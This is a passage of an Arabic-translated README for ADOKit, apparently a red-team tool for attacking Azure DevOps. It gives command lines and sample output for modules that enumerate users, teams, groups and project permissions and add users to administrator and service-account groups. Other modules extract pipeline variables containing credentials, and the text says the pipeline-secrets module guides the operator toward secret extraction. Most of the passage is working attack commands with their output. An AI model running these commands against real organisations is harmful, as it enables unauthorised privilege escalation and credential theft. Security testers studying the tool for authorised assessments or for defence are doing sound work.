قم بتوفير وحدة searchuser ومعايير البحث الخاصة بك في الوسيط السطري /search:، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيؤدي ذلك إلى إخراج اسم المستخدم المطابق والاسم المعروض واسم المستخدم الرئيسي.
ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user
ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user
C:>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"
================================================== Module: searchuser Auth Type: API Key Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
user1 | User 1 | [email protected]
user2 | User 2 | [email protected]
4/3/23 20:12:24 Finished execution of searchuser
### قائمة الفرق
#### حالة الاستخدام
> *سرد الفرق داخل مثيل Azure DevOps*
#### الصياغة
قم بتوفير الوحدة `listteam`، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيقوم هذا بإخراج اسم الفريق واسم المشروع ووصف الفريق.
`ADOKit.exe listteam /credential:apiKey /url:https://dev.azure.com/organizationName`
`ADOKit.exe listteam /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName`
#### مثال على الإخراج```
C:\>ADOKit.exe listteam /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listteam
Auth Type: API Key
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 5/31/2024 9:48:26 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Team Name | Project | Description
----------------------------------------------------------------------------------------------------------------------------------------
ProjectWithMultipleRepos Team | ProjectWithMultipleRepos | The default project team.
MaraudersMap Team | MaraudersMap | The default project team.
TestProject2 Team | TestProject2 | The default project team.
TestProject Team | TestProject | The default project team.
ابحث عن الفرق المحددة في مثيل Azure DevOps
قم بتوفير وحدة searchteam ومعايير البحث الخاصة بك في وسيط سطر الأوامر /search:، إلى جانب أي معلومات مصادقة وURL ذات صلة. سيقوم هذا بإخراج اسم الفريق واسم المشروع ووصف الفريق.
ADOKit.exe searchteam /credential:apiKey /url:https://dev.azure.com/organizationName /search:someTeam
ADOKit.exe searchteam /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:someTeam
C:>ADOKit.exe searchteam /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:test
================================================== Module: searchteam Auth Type: API Key Search Term: test Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Team Name | Project | Description
TestProject2 Team | TestProject2 | The default project team.
TestProject Team | TestProject | The default project team.
### الحصول على أعضاء الفريق
#### حالة الاستخدام
> *الحصول على أعضاء الفريق لفريق معين*
#### الصيغة
قم بتوفير وحدة `getteammembers` ومعايير البحث الخاصة بك في وسيط سطر الأوامر `/search:`، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيقوم هذا بإخراج اسم الفريق واسم مستخدم عضو الفريق واسم عرض عضو الفريق.
`ADOKit.exe getteammembers /credential:apiKey /url:https://dev.azure.com/organizationName /search:someTeam`
`ADOKit.exe getteammembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:someTeam`
#### مثال الإخراج```
C:\source\ADOKit-main\ADOKit\bin\Release>ADOKit.exe getteammembers /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"dev team"
==================================================
Module: getteammembers
Auth Type: API Key
Search Term: dev team
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 5/31/2024 10:45:11 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Team Name | Username | User Display Name
-------------------------------------------------------------------------------------------------------------------------------------------------------
Dev Team | [email protected] | User 1
Dev Team | [email protected] | user3
Dev Team | [email protected] | user4
سرد المجموعات داخل مثيل Azure DevOps
قدّم وحدة listgroup، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيعمل ذلك على إخراج اسم المستخدم الرئيسي واسم العرض ووصف المجموعة.
ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization
================================================== Module: listgroup Auth Type: API Key Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds. [MaraudersMap]\Readers | Readers | Members of this group have access to the team project. [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection. [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team. [TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only. [YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group. [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
---SNIP---
4/3/23 20:48:46 Finished execution of listgroup
### مجموعات البحث
#### حالة الاستخدام
> *البحث عن مجموعة (مجموعات) معينة في مثيل Azure DevOps*
#### الصيغة
قم بتوفير وحدة `searchgroup` ومعايير البحث الخاصة بك في وسيطة سطر الأوامر `/search:`، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيؤدي ذلك إلى إخراج اسم المستخدم الرئيسي واسم العرض ووصف المجموعة المطابقة.
`ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"`
`ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"`
#### مثال على الإخراج```
C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"
==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:41 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
4/3/23 20:48:42 Finished execution of searchgroup
سرد جميع أعضاء المجموعة لمجموعة معينة
قم بتوفير الوحدة النمطية getgroupmembers والمجموعة(المجموعات) التي ترغب في البحث عنها في وسيطة سطر الأوامر /group:، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيؤدي ذلك إلى إخراج اسم المستخدم الرئيسي للمجموعة المطابقة، بالإضافة إلى كل عضو في تلك المجموعة بما في ذلك عنوان البريد الإلكتروني واسم العرض الخاص بالمستخدم.
ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"
ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"
C:>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"
================================================== Module: getgroupmembers Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Group | Mail Address | Display Name
[TestProject2]\Build Administrators | [email protected] | User 1
[TestProject2]\Build Administrators | [email protected] | User 2
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Project Administrators | [email protected] | Ron Smith
[TestProject2]\Project Administrators | [email protected] | User 1
[TestProject2]\Project Administrators | [email protected] | User 2
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith
[ProjectWithMultipleRepos]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Build Administrators | [email protected] | Brett Hawkins
4/4/23 13:11:09 Finished execution of getgroupmembers
### الحصول على أذونات المشروع
#### حالة الاستخدام
> *الحصول على قائمة بمن لديه أذونات لمشروع معين.*
#### الصيغة
قم بتوفير وحدة `getpermissions` والمشروع الذي تريد البحث عنه في وسيط سطر الأوامر `/project:`، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيؤدي هذا إلى إخراج اسم المستخدم الأساسي واسم العرض ووصف المجموعة المطابقة. بالإضافة إلى ذلك، سيؤدي هذا إلى إخراج أعضاء المجموعة لكل من تلك المجموعات.
`ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"`
`ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"`
#### مثال على الإخراج```
C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[*] INFO: Listing group members for each group that has permissions to this project
GROUP NAME: [MaraudersMap]\Build Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Contributors
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributors | [email protected] | User 1
[MaraudersMap]\Contributors | [email protected] | User 2
GROUP NAME: [MaraudersMap]\MaraudersMap Team
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | [email protected] | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Valid Users
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Readers
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | [email protected] | John Smith
4/4/23 13:11:18 Finished execution of getpermissions
إضافة مستخدم إلى مجموعة مديري المشروع لمشروع معين.
قم بتوفير الوحدة addprojectadmin مع /project: و /user: لمستخدم معين ليتم إضافته إلى مجموعة Project Administrators للمشروع المحدد. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. راجع جدول تفاصيل الوحدة للحصول على الأذونات اللازمة لتنفيذ هذا الإجراء.
ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
================================================== Module: addprojectadmin Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Project Administrators | [email protected] | User 1
4/4/23 18:52:47 Finished execution of addprojectadmin
### إزالة مسؤول المشروع
#### حالة الاستخدام
> *إزالة مستخدم من مجموعة مسؤولي المشروع لمشروع معين.*
#### الصيغة
قم بتوفير الوحدة `removeprojectadmin` مع `/project:` و `/user:` للمستخدم المراد إزالته من مجموعة `مسؤولي المشروع` للمشروع المحدد. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. راجع [جدول تفاصيل الوحدة](#module-details-table) للصلاحيات المطلوبة لتنفيذ هذا الإجراء.
`ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"`
`ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"`
#### مثال على الإخراج```
C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:19:43 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
4/4/23 19:19:44 Finished execution of removeprojectadmin
إضافة مستخدم إلى مجموعة مسؤولي البناء لمشروع معين.
قم بتوفير الوحدة addbuildadmin مع /project: و /user: لإضافة مستخدم معين إلى مجموعة Build Administrators للمشروع المحدد. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. راجع جدول تفاصيل الوحدة لمعرفة الأذونات اللازمة لتنفيذ هذا الإجراء.
ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
================================================== Module: addbuildadmin Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
[MaraudersMap]\Build Administrators | [email protected] | User 1
4/4/23 19:41:55 Finished execution of addbuildadmin
### إزالة مسؤول الإنشاء
#### حالة الاستخدام
> *إزالة مستخدم من مجموعة مسؤولي الإنشاء لمشروع معين.*
#### الصيغة
قدّم الوحدة النمطية `removebuildadmin` مع `/project:` و `/user:` لمستخدم معين ليتم إزالته من مجموعة `Build Administrators` للمشروع المحدد. بالإضافة إلى ذلك، قدّم أي معلومات مصادقة ذات صلة وعنوان URL. راجع [جدول تفاصيل الوحدة](#module-details-table) للحصول على الأذونات اللازمة لتنفيذ هذا الإجراء.
`ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"`
`ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"`
#### مثال الإخراج```
C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:42:10 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4/4/23 19:42:11 Finished execution of removebuildadmin
إضافة مستخدم إلى مجموعة مسؤولي مجموعة المشروع.
قم بتوفير الوحدة addcollectionadmin مع /user: للمستخدم المراد إضافته إلى مجموعة Project Collection Administrators. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. راجع جدول تفاصيل الوحدة للاطلاع على الأذونات اللازمة لتنفيذ هذا الإجراء.
ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
================================================== Module: addcollectionadmin Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith
[YourOrganization]\Project Collection Administrators | [email protected] | User 1
4/4/23 20:04:43 Finished execution of addcollectionadmin
### إزالة مسؤول المجموعة
#### حالة الاستخدام
> *إزالة مستخدم من مجموعة مسؤولي مجموعة المشروع.*
#### الصيغة
قم بتوفير الوحدة `removecollectionadmin` مع `/user:` لمستخدم معين لإزالته من مجموعة `Project Collection Administrators`. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. انظر [جدول تفاصيل الوحدة](#module-details-table) للحصول على الأذونات اللازمة لتنفيذ هذا الإجراء.
`ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"`
`ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"`
#### مثال على الإخراج```
C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:10:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith
4/4/23 20:10:38 Finished execution of removecollectionadmin
إضافة مستخدم إلى مجموعة مسؤولي إنشاء المجموعة.
قم بتوفير الوحدة addcollectionbuildadmin مع /user: لمستخدم معين ليتم إضافته إلى مجموعة Project Collection Build Administrators. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. راجع جدول تفاصيل الوحدة للحصول على الأذونات اللازمة لتنفيذ هذا الإجراء.
ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
================================================== Module: addcollectionbuildadmin Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
[YourOrganization]\Project Collection Build Administrators | [email protected] | User 1
4/5/23 12:21:42 Finished execution of addcollectionbuildadmin
### إزالة مسؤول إنشاء المجموعة
#### حالة الاستخدام
> *إزالة مستخدم من مجموعة مسؤولي إنشاء المجموعة للمشروع.*
#### الصيغة
قم بتوفير الوحدة `removecollectionbuildadmin` مع `/user:` للمستخدم المراد إزالته من مجموعة `Project Collection Build Administrators`. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. راجع [جدول تفاصيل الوحدة](#module-details-table) لمعرفة الأذونات اللازمة لتنفيذ هذا الإجراء.
`ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"`
`ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"`
#### مثال الإخراج```
C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4/5/23 12:22:02 Finished execution of removecollectionbuildadmin
إضافة مستخدم إلى مجموعة Project Collection Build Service Accounts.
قم بتوفير الوحدة النمطية addcollectionbuildsvc مع /user: لمستخدم معين ليتم إضافته إلى مجموعة Project Collection Build Service Accounts. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. انظر جدول تفاصيل الوحدة للحصول على الأذونات اللازمة لتنفيذ هذا الإجراء.
ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
================================================== Module: addcollectionbuildsvc Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
[YourOrganization]\Project Collection Build Service Accounts | [email protected] | User 1
4/5/23 12:22:15 Finished execution of addcollectionbuildsvc
### إزالة حساب خدمة بناء المجموعة
#### حالة الاستخدام
> *إزالة مستخدم من مجموعة حسابات خدمة بناء المجموعة.*
#### بناء الجملة
قم بتوفير الوحدة النمطية `removecollectionbuildsvc` مع `/user:` للمستخدم المحدد ليتم إزالته من مجموعة `Project Collection Build Service Accounts`. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. راجع [جدول تفاصيل الوحدة النمطية](#module-details-table) للحصول على الأذونات اللازمة لتنفيذ هذا الإجراء.
`ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"`
`ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"`
#### مثال للإخراج```
C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:27 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4/5/23 12:22:28 Finished execution of removecollectionbuildsvc
إضافة مستخدم إلى مجموعة حسابات خدمة المجموعة للمشروع.
قدِّم الوحدة addcollectionsvc مع /user: للمستخدم المطلوب إضافته إلى مجموعة Project Collection Service Accounts. بالإضافة إلى ذلك، قدِّم أي معلومات توثيق ذات صلة وعنوان URL. راجع جدول تفاصيل الوحدة للحصول على الأذونات اللازمة لتنفيذ هذا الإجراء.
ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
================================================== Module: addcollectionsvc Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
[YourOrganization]\Project Collection Service Accounts | [email protected] | John Smith
[YourOrganization]\Project Collection Service Accounts | [email protected] | User 1
4/5/23 15:21:04 Finished execution of addcollectionsvc
### إزالة حساب خدمة المجموعة
#### حالة الاستخدام
> *إزالة مستخدم من مجموعة حسابات خدمة مشروع المجموعة.*
#### الصيغة
قم بتوفير الوحدة النمطية `removecollectionsvc` مع `/user:` لمستخدم معين ليتم إزالته من مجموعة `Project Collection Service Accounts`. بالإضافة إلى ذلك، قم بتوفير أي معلومات مصادقة ذات صلة وعنوان URL. راجع [جدول تفاصيل الوحدة](#module-details-table) للحصول على الأذونات اللازمة لتنفيذ هذا الإجراء.
`ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"`
`ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"`
#### مثال على المخرجات```
C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:43 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | [email protected] | John Smith
4/5/23 15:21:44 Finished execution of removecollectionsvc
استخراج أي متغيرات خط أنابيب مستخدمة في المشروع(ات)، والتي قد تحتوي على بيانات اعتماد أو معلومات مفيدة أخرى.
قم بتوفير وحدة getpipelinevars مع /project: لمشروع معين لاستخراج أي متغيرات خط أنابيب مستخدمة. إذا كنت ترغب في استخراج متغيرات خط الأنابيب من جميع المشاريع، فحدد all في وسيط /project:.
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
================================================== Module: getpipelinevars Auth Type: Cookie Project: maraudersmap Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Pipeline Var Name | Pipeline Var Value
credential | P@ssw0rd123!
url | http://blah/
4/6/23 16:08:36 Finished execution of getpipelinevars
### الحصول على أسرار خط الأنابيب
#### حالة الاستخدام
> *استخراج أسماء أي أسرار خط أنابيب مستخدمة في المشروع(ات)، مما يوجه المشغل أين يحاول إجراء استخراج الأسرار.*
#### بناء الجملة
قم بتوفير الوحدة `getpipelinesecrets` مع `/project:` لمشروع معين لاستخراج أسماء أي أسرار خط أنابيب مستخدمة. إذا كنت ترغب في استخراج أسماء أسرار خط الأنابيب من جميع المشاريع، حدد `all` في الوسيط `/project:`.
`ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"`
